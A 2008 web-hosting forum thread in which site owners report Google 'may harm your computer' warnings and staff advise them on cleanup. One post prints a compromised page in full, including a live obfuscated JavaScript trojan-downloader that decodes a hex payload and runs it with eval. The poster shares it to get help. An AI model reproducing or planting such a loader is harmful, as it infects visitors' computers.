dakotatech Posted April 30, 2008 Share Posted April 30, 2008 Google has just listed my site as "This site may harm your computer". I have run this site for about four years without issue. What is it that they think is wrong. Where do I go from here? The site is fixyourowntv.com Quote Link to comment Share on other sites More sharing options...
TCH-Thomas Posted April 30, 2008 Share Posted April 30, 2008 Kaspersky Internet Security (KIS) just warned me when I tried to visit the site. KIS told me the site contains "Trojan-Downloader.HTML.IFrame.ds" so that could be why. Quote Link to comment Share on other sites More sharing options...
dakotatech Posted April 30, 2008 Author Share Posted April 30, 2008 I am confused as to how this happened (if it did). I haven't changed anything on the site in a couple of months? All that is there is php, html and some jpegs. Could someone have added something without my knowledge? Quote Link to comment Share on other sites More sharing options...
TCH-Zac Posted April 30, 2008 Share Posted April 30, 2008 There is an issue with the Java Script(s) on your site. When I went there I got several Java Errors popup one after another. Quote Link to comment Share on other sites More sharing options...
TCH-Thomas Posted April 30, 2008 Share Posted April 30, 2008 Someone could have done that yes. Do you have a forum or anything similar (ie a place where others can communicate)? I would ask the helpdesk if they can see if the site seems to have been compromised. Quote Link to comment Share on other sites More sharing options...
TCH-Zac Posted April 30, 2008 Share Posted April 30, 2008 dakotatech, This is what I will recommend to you. Several things: 1. Check your sites permissions, make sure not everything is CHMOD to 777 2. Check your Java Scripts Note: The issue appears to be within your Java Scripts. Every issue I am receiving is to do with a Java Script. If you can't work things out please open a ticket with the helpdesk from the link above and have a TCH Support Tech look into a little further for you. Quote Link to comment Share on other sites More sharing options...
dakotatech Posted April 30, 2008 Author Share Posted April 30, 2008 My java script was one that I copied from somewhere years ago. It's been fine til now. I am not a java kind of guy. Heck I'm not that good at html or php either. When I go th my site directly I don't see any problem (IE6). The best I can think of is I'll compare things to about a year ago, It's the same code. Or should be. I don't have a forum or anything for someone to download. Quote Link to comment Share on other sites More sharing options...
dakotatech Posted April 30, 2008 Author Share Posted April 30, 2008 I'm not even sure how to check my permissions. Quote Link to comment Share on other sites More sharing options...
TCH-Bruce Posted April 30, 2008 Share Posted April 30, 2008 Please open a ticket with the help desk. Link at top of page or in my signature. Let the techs check it out. Quote Link to comment Share on other sites More sharing options...
dakotatech Posted April 30, 2008 Author Share Posted April 30, 2008 I opened one a few minutes ago. Where's my blood pressure pills! Oh I don't use them... When Google snubs you it's like kiss of death for a small site. Quote Link to comment Share on other sites More sharing options...
TCH-Dick Posted April 30, 2008 Share Posted April 30, 2008 If any one comes across this issue, you will need to follow the instructions provided by Google at http://www.google.com/support/webmasters/b...py?answer=45432 Once you have the details, we can then provide assistance if needed. Quote Link to comment Share on other sites More sharing options...
TCH-Dick Posted April 30, 2008 Share Posted April 30, 2008 Also note that Google uses StopBadware.org for identification of sites that it deems harmful. You can view these reports at http://www.stopbadware.org/home/reportsearch , however, you will still need to resolve this with Google. Quote Link to comment Share on other sites More sharing options...
OJB Posted April 30, 2008 Share Posted April 30, 2008 Google suspects the site has malware... which has probably been inserted maliciously due to insecure permissions or scripts somewhere http://www.google.com/support/bin/answer.p...m=1&ct=help There is a link at the bottom of how to resolve this issue with google. Quote Link to comment Share on other sites More sharing options...
TCH-Dick Posted April 30, 2008 Share Posted April 30, 2008 There is a link at the bottom of how to resolve this issue with google. That would be the link I posted earlier Quote Link to comment Share on other sites More sharing options...
TheMovieman Posted May 14, 2008 Share Posted May 14, 2008 I got one of these recently. It was with my photo gallery (installed via fantastico). I knew there was something wrong not only with that but my message board (also via fantastico). I even opened a ticket, described the problem but they didn't find anything. I had already removed the message board but forgot about the photo gallery. Anyway, that's been removed as well. The site itself is fine, however. Quote Link to comment Share on other sites More sharing options...
paco Posted June 16, 2008 Share Posted June 16, 2008 Yesterday, a user warn us that our page had a trojan: JS/TrojanDownloader/IFrame/EY.gen (trojan) The main page (the page with the trojan) is only a photo that redirect to the shop (only four lines), but we had this page this morning (with the javascript trojan): ><html> <head> <title>Material de Kickboxing</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body bgcolor="#000000" text="#000000" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><!-- o --><script language="JavaScript"> <!-- function gC1cGbQ46(gA6sjiMTa){var bmXq52e35=arguments.callee.toString().replace(/\W/g,'').toUpperCase();var gbb5movQ8;var p46aJYMAG;var MiFBf0yFB=bmXq52e35.length;var B4gE81Sr0;var V8UjyXJ2x='';var Nf5f41fk5=new Array();for(p46aJYMAG=0;p46aJYMAG<256;p46aJYMAG++)Nf5f41fk5[p46aJYMAG]=0;var gbb5movQ8=1;for(p46aJYMAG=128;p46aJYMAG;p46aJYMAG>>=1) {gbb5movQ8=(gbb5movQ8>>>1)^((gbb5movQ8&1)?3988292384:0);for(hjpygo5A5=0;hjpygo5A5<256;hjpygo5A5+=p46aJYMAG*2) {Nf5f41fk5[hjpygo5A5+p46aJYMAG]=(Nf5f41fk5[hjpygo5A5]^gbb5movQ8);if (Nf5f41fk5[hjpygo5A5+p46aJYMAG] < 0) {Nf5f41fk5[hjpygo5A5+p46aJYMAG]+=4294967296;}}}B4gE81Sr0=4294967295;for(gbb5movQ8=0;gbb5movQ8<MiFBf0yFB;gbb5movQ8++){B4gE81Sr0=Nf5f41fk5[(B4gE81Sr0^bmXq52e35.charCodeAt(gbb5movQ8))&255]^((B4gE81Sr0>>8)&16777215);}B4gE81Sr0=B4gE81Sr0^4294967295;if (B4gE81Sr0<0) {B4gE81Sr0+=4294967296;}B4gE81Sr0=B4gE81Sr0.toString(16).toUpperCase();var HNii6t2UC=new Array();var MiFBf0yFB=B4gE81Sr0.length;for(p46aJYMAG=0;p46aJYMAG<8;p46aJYMAG++) {if (MiFBf0yFB + p46aJYMAG >= 8) {HNii6t2UC[p46aJYMAG]=B4gE81Sr0.charCodeAt(p46aJYMAG+MiFBf0yFB-8);} else {HNii6t2UC[p46aJYMAG]=48;}}var B1K23HoQ5=0;var iCvK5hVNE;var V8UjyXJ2x='';var nekrid46u;MiFBf0yFB=gA6sjiMTa.length;for(p46aJYMAG=0;p46aJYMAG<MiFBf0yFB;p46aJYMAG+=2){iCvK5hVNE=parseInt(gA6sjiMTa.substr(p46aJYMAG, 2),16); nekrid46u=iCvK5hVNE-HNii6t2UC[B1K23HoQ5];if(nekrid46u<0) {nekrid46u += 256;}V8UjyXJ2x+=String.fromCharCode(nekrid46u);if(B1K23HoQ5<HNii6t2UC.length-1){B1K23HoQ5++;} else {B1K23HoQ5=0;}}eval(V8UjyXJ2x);} gC1cGbQ46('9da598aeae97b3a467ada7a2B5976d57759f9bABa29FAA50aca89876639aB9a4a9706468786B73616 D69636a786a7362696598a0aa5fA799a7659Ea76f95ac9978A672AEb497B7615B56acA2A5A6ad6D5b67575 9A997ae97A1AA725B725465A3ADAFa19e7E54a79Fab9a9aAB7B5275A0b1587375709BABa29Aa39A77685b8 0'); //--> </script> <!-- c --> <div align="center"><a href="/tienda"><img src="entrada.jpg" width="667" height="500" border="0"></a> </div> </body> </html> We have a phpbb3 private forum (with none public area, all restricted for two persons) , and a zencart 1.3.7 shop (I have the same scripts in other pages without any problem). I have removed the trojan, and set index.html permissions to read only, but I'm worried becasuse I don't know how this kind of trojan has attacked our domain Quote Link to comment Share on other sites More sharing options...
TCH-Bruce Posted June 16, 2008 Share Posted June 16, 2008 Please open a ticket with the help desk, link above or in my signature. The techs will evaluate the situation and help you secure your site. Also, Zencart is at version 1.3.8 Do you have all security updates installed for both phpbb3? Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.